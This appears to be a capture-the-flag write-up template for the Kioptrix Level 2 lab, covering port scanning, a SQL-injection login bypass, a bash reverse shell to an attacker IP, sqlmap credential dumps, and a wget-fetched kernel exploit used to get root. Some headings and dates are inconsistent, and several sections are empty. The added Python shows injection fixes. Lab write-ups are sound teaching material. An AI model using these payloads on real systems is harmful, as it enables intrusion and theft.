
Escape

Overview

Name: Template
Release Date: 2024-02-26
Write-up Author: kill3r
Machine Author: kill3r
Difficulty: Medium
User Flag:
Root Flag:
Link: https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

Related skills

  1. File Upload
  2. Local File Include
  3. vim to shell

Weak points

  1. Weak wordlist and information-gathering skills

Nmap scan

```bash
# Scan all TCP ports (1-65535) on the target. --min-rate=1000 sends at least
# 1000 packets per second and -T4 selects the aggressive timing template.
# grep -oE '(^[0-9][^/tcp]*)' extracts the port numbers from the output and
# tr '\n' ',' joins them into a single comma-separated string.
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.19 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')

# Rescan only the discovered ports: -p$ports uses the list extracted above,
# -sV detects service versions, -sC runs the default NSE script set for common
# checks, -O attempts OS detection and -oN nmap.txt saves the result to nmap.txt.
nmap -p$ports -sV -sC -O 10.10.10.19 -oN nmap.txt
```
┌──(root㉿kill3r)-[/home/kill3r]
└─# ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.19 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')
┌──(root㉿kill3r)-[/home/kill3r]
└─# nmap -p$ports -sV -sC -O 10.10.10.19 -oN nmap.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2023-08-05 11:31 CST
Nmap scan report for 10.10.10.19
Host is up (0.00026s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 613/udp status
|_ 100024 1 616/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_RC2_128_CBC_WITH_MD5
|_http-server-header: Apache/2.0.52 (CentOS)
|_ssl-date: 2023-08-05T00:22:22+00:00; -3h09m22s from scanner time.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
616/tcp open status 1 (RPC #100024)
631/tcp open ipp CUPS 1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-title: 403 Forbidden
|_http-server-header: CUPS/1.1
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:53:19:4C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

Host script results:
|_clock-skew: -3h09m22s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.02 seconds

Enumeration

SMB enumeration

Port: 139 389 445 636

  • enum4linux -a/-A 127.0.0.1
$ enum4linux -A <ip>

Web

HTTP Web Server, Port Like: 80 443 81 8080 8443 4443 8081

  • Finger: retrieves the user list and configuration information about specific users on a system

whatweb

```bash
# Identifies the target site's technology stack, CMS (content management
# system), plugins, framework and other site-related details by analysing
# the HTTP responses and page content.
┌──(root㉿kill3r)-[~]
└─# whatweb 192.168.56.101
http://192.168.56.101 [200 OK] Apache[2.4.46], Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.46 (Debian)], IP[192.168.56.101], Script[text/javascript]
```
  • Directory enumeration

dirb http://192.168.56.101

dirsearch -u http://192.168.56.101 -r

gobuster dir -w ... -u http://192.168.56.101 -x html,php,js,bak

┌──(root㉿kill3r)-[/]
└─# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.9 -x html,php,js,bak
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.9
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: html,php,js,bak
[+] Timeout: 10s
===============================================================
2023/08/05 13:37:07 Starting gobuster in directory enumeration mode
===============================================================
Error: error on running gobuster: unable to connect to http://10.10.10.9/: Get "http://10.10.10.9/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)

┌──(root㉿kill3r)-[/]
└─# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.19 -x html,php,js,bak
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.19
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: js,bak,html,php
[+] Timeout: 10s
===============================================================
2023/08/05 13:37:56 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 284]
/index.php (Status: 200) [Size: 667]
/manual (Status: 301) [Size: 311] [--> http://10.10.10.19/manual/]
/usage (Status: 403) [Size: 284]
/.html (Status: 403) [Size: 284]
Progress: 1102282 / 1102805 (99.95%)
===============================================================
2023/08/05 13:43:45 Finished
===============================================================
  • Vulnerability scanning

$ nikto -h http://www.example.com/
$ nuclei -u https://example.com/

wordlist

  • cewl.list: cewl http://192.168.56.101/ -w dict.txt
  • pass.list
    5afac8d85f
    66lajGGbla
  • user.list
    admin
    john
  • hash.list
  • information.list

Reproduction steps

Browse the target and look for functional entry points.

Start Burp and break into the admin panel:

  1. SQL injection
  2. Universal password: admin' or '1'='1
  3. Forged access credentials
  4. Weak passwords
  5. Modifying the response packet
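The universal password in step 2 works because the login query concatenates user input straight into the SQL string. The following added example (not code from the original write-up or from the target application) recreates the users table from the later sqlmap dump in an in-memory SQLite database and shows the vulnerable query beside the parameterised version that defeats the payload:

```python
import sqlite3

# Constructed sample table mirroring the webapp.users dump later in this
# write-up (id, username, password); the passwords are stored in clear text,
# as they are on the target.
SAMPLE_USERS = [(1, "admin", "5afac8d85f"), (2, "john", "66lajGGbla")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username, password):
    """String-built query: the user's quotes become part of the SQL."""
    sql = (
        "SELECT username FROM users WHERE username='" + username
        + "' AND password='" + password + "'"
    )
    # With username  admin' or '1'='1  the WHERE clause reads
    #   username='admin' or '1'='1' AND password='...'
    # AND binds tighter than OR, so the row for admin matches regardless of
    # the password and the check is bypassed.
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterised query: the driver binds values, so quotes stay data."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "admin' or '1'='1"
    print("vulnerable:", login_vulnerable(db, payload, "wrong"))  # admin
    print("safe      :", login_safe(db, payload, "wrong"))        # None
    print("safe, real:", login_safe(db, "admin", "5afac8d85f"))   # admin
```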

Successfully got into the admin panel, but where is my input box???

Capture the request in Burp to bring the box back out.

At a glance this looks like a typical command-execution point: it takes an IP address, so keep capturing the requests.

  • Kali nc listener: nc -lvvp 6666
  • bash -i >& /dev/tcp/10.10.10.15/6666 0>&1
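The IP field that turned out to be a command-execution point is the classic case of passing form input to a shell. This added example (a hypothetical reimplementation, not the target's PHP) shows the unsafe way the command line gets built next to a version that validates the input as a single IP address with Python's ipaddress module and invokes ping without a shell, so the reverse-shell payload above is rejected:

```python
import ipaddress
import subprocess

# Constructed inputs: a legitimate address and the injected command from this
# write-up, as they would arrive in the form's IP field.
GOOD_INPUT = "10.10.10.15"
BAD_INPUT = "10.10.10.15; bash -i >& /dev/tcp/10.10.10.15/6666 0>&1"


def build_ping_vulnerable(user_input):
    """How the vulnerable page builds its command: plain concatenation that is
    handed to a shell, so ';' ends the ping and starts the injected command.
    Returned as a string only; it is never executed here."""
    return "ping -c 3 " + user_input


def build_ping_safe(user_input):
    """Return an argv list for ping, or None if the input is not one IP.

    ipaddress.ip_address() accepts only a single literal IPv4/IPv6 address, so
    separators, spaces and redirections can never end up in the result, and an
    argv list makes subprocess exec ping directly without /bin/sh."""
    try:
        addr = ipaddress.ip_address(user_input.strip())
    except ValueError:
        return None
    return ["ping", "-c", "3", str(addr)]


def run_ping_safe(user_input):
    """Run the validated ping and return its output, or a rejection message."""
    argv = build_ping_safe(user_input)
    if argv is None:
        return "rejected: input is not a single IP address"
    proc = subprocess.run(argv, capture_output=True, text=True)
    return proc.stdout + proc.stderr


if __name__ == "__main__":
    print(build_ping_vulnerable(BAD_INPUT))  # the full injected command line
    print(build_ping_safe(BAD_INPUT))        # None
    print(run_ping_safe(BAD_INPUT))          # rejected: ...
```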

Vulnerability analysis

  • MySQL-unauthorized

    ┌──(root㉿kill3r)-[/]
    └─# mysql -uroot -proot -h10.10.10.19
    ERROR 1130 (HY000): Host 'kill3r.lan' is not allowed to connect to this MySQL server

  • MySQL-InJect

    ┌──(root㉿kill3r)-[/opt]
    └─# sqlmap -r sql_InJect.txt --level 5 --risk 3 --dbs

    available databases [1]:
    [*] webapp

    ┌──(root㉿kill3r)-[/opt]
    └─# sqlmap -r sql_InJect.txt --level 5 --risk 3 -D "webapp" --tables --risk 3
    Database: webapp
    [1 table]
    +-------+
    | users |
    +-------+

    ┌──(root㉿kill3r)-[/opt]
    └─# sqlmap -r sql_InJect.txt --level 5 --risk 3 -D "webapp" -T "users" --columns
    Database: webapp
    Table: users
    [3 columns]
    +----------+-------------+
    | Column | Type |
    +----------+-------------+
    | id | numeric |
    | password | non-numeric |
    | username | non-numeric |
    +----------+-------------+

    ┌──(root㉿kill3r)-[/opt]
    └─# sqlmap -r sql_InJect.txt --level 5 --risk 3 -D "webapp" -T "users" -C "id,username,password" --dump
    Database: webapp
    Table: users
    [2 entries]
    +----+----------+------------+
    | id | username | password |
    +----+----------+------------+
    | 1 | admin | 5afac8d85f |
    | 2 | john | 66lajGGbla |
    +----+----------+------------+

Privilege escalation

  • Searching for SUID binaries turned up nothing useful

    bash-3.00$ find / -perm -u=s -type f 2>/dev/null
    /sbin/unix_chkpwd
    /sbin/pam_timestamp_check
    /sbin/pwdb_chkpwd
    /usr/sbin/ccreds_validate
    /usr/sbin/userhelper
    /usr/sbin/userisdnctl
    /usr/sbin/suexec
    /usr/sbin/usernetctl
    /usr/libexec/openssh/ssh-keysign
    /usr/libexec/pt_chown
    /usr/kerberos/bin/ksu
    /usr/lib/squid/pam_auth
    /usr/lib/squid/ncsa_auth
    /usr/bin/chsh
    /usr/bin/rcp
    /usr/bin/sudo
    /usr/bin/chage
    /usr/bin/crontab
    /usr/bin/rlogin
    /usr/bin/rsh
    /usr/bin/gpasswd
    /usr/bin/at
    /usr/bin/newgrp
    /usr/bin/chfn
    /usr/bin/lppasswd
    /usr/bin/sg
    /usr/bin/passwd
    /bin/mount
    /bin/traceroute6
    /bin/traceroute
    /bin/umount
    /bin/ping6
    /bin/ping
    /bin/su
  • Viewing Crontab

    bash-3.00$ cat /etc/crontab
    SHELL=/bin/bash
    PATH=/sbin:/bin:/usr/sbin:/usr/bin
    MAILTO=root
    HOME=/

    # run-parts
    01 * * * * root run-parts /etc/cron.hourly
    02 4 * * * root run-parts /etc/cron.daily
    22 4 * * 0 root run-parts /etc/cron.weekly
    42 4 1 * * root run-parts /etc/cron.monthly
  • Viewing kernel and OS version

    bash-3.00$ cat /etc/*release*
    cat: /etc/lsb-release.d: Is a directory
    CentOS release 4.5 (Final)

    bash-3.00$ uname -a
    Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux

    ┌──(root㉿kill3r)-[/opt]
    └─# searchsploit centos 2.6
    ---------------------------------------------------------------------------- ---------------------------------
     Exploit Title                                                              | Path
    ---------------------------------------------------------------------------- ---------------------------------
    Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / | linux/local/9545.c
    Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / Ce | linux/local/9479.c
    Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 | linux_x86/local/9542.c
    Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Esca | linux/local/25444.c
    Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mu | linux_x86-64/local/45516.c
    ---------------------------------------------------------------------------- ---------------------------------
    Shellcodes: No Results
    Papers: No Results

    bash-3.00$ lsb_release -a
    lsb_release -a
    LSB Version: :core-3.0-ia32:core-3.0-noarch:graphics-3.0-ia32:graphics-3.0-noarch
    Distributor ID: CentOS
    Description: CentOS release 4.5 (Final)
    Release: 4.5
    Codename: Final

  • Vulnerability exploitation

    ┌──(root㉿kill3r)-[/opt]
    └─# searchsploit -m 9545.c
    ┌──(root㉿kill3r)-[/opt/vulnhub]
    └─# python3 -m http.server 8888


    bash-3.00$ cd /tmp
    bash-3.00$ wget http://10.10.10.15:8888/9545.c
    --21:49:13-- http://10.10.10.15:8888/9545.c
    => `25444.c'
    Connecting to 10.10.10.15:8888... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 9,408 (9.2K) [text/x-csrc]
    0K ......... 100% 1.25 GB/s
    21:51:48 (1.25 GB/s) - `9545.c' saved [9408/9408]

    bash-3.00$ gcc 9545.c
    9545.c:376:28: warning: no newline at end of file
    bash-3.00$ ./a.out
    sh: no job control in this shell
    sh-3.00# id
    uid=0(root) gid=0(root) groups=48(apache)

Shell as user1

Shell as user2

Shell as root

Save a screenshot as the flag or proof.